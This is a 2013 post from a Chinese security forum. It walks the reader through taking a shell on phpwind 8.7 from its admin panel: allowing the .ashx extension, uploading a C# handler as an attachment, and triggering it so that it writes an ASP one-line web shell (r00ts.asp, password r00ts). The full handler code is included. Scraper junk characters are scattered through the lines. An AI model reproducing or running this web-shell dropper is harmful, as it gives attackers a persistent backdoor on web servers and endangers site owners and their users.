找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2152|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
4 @# V/ D% t; W; p  K$ I' m, U* W 4 u/ e4 F: g% c4 q
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
1 r3 @, z2 I/ b  }& { ' E3 J. M& D( R# l9 z& U
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
% Y' H( P( P8 Z# T! K' R
  [0 \2 ^2 W* ^然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx1 }/ T# g/ H# f( ]# J' Y
7 Y9 V$ Y1 X. H. I7 h
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts4 g, r) b( i# P5 s' [( x& G

7 [' c% a1 G/ K- T) [下面是代码:
: u3 I* R5 ?6 h/ W" f; j 6 j4 I& N" J( P5 v2 ^; a6 B, Q
<%@ WebHandler Language="C#"Class="Handler" %>* [2 ?. b; i4 v5 s, ?
using System;
4 j+ |& j2 P! u/ nusing System.Web;4 _5 m2 w- Q, V3 F* `- {
using System.IO;
8 k& j, {, {$ }- s% F; l7 opublic class Handler : IHttpHandler {
3 S' ~% {; c' P( f$ ?3 |8 [public void ProcessRequest (HttpContext context) {
  |  Z& h! {' e% C# d# }$ Scontext.Response.ContentType = "text/plain";/ w2 S, p2 h  {; B
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
% B6 ^: N6 W+ K- ]; Gfile1.Write("<%eval request(\"r00ts\")%>");% U4 h7 ?8 f" n
file1.Flush();( Z) ?# K/ E+ I( i: d3 W% X9 Y2 a+ x
file1.Close();  \, S2 s8 x1 y, c
}, W! F% X4 N3 ]6 n: m
public bool IsReusable {
2 }1 k+ e) _; H+ g" }get {- ~* O/ s. r& E! q5 w
return false;- W; x* X8 v" v9 m' k& R
}
, f6 [0 a9 n8 L# Q4 }1 x}
1 D& m6 n! V5 x) W5 A/ c}; F' G# c" V& w7 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表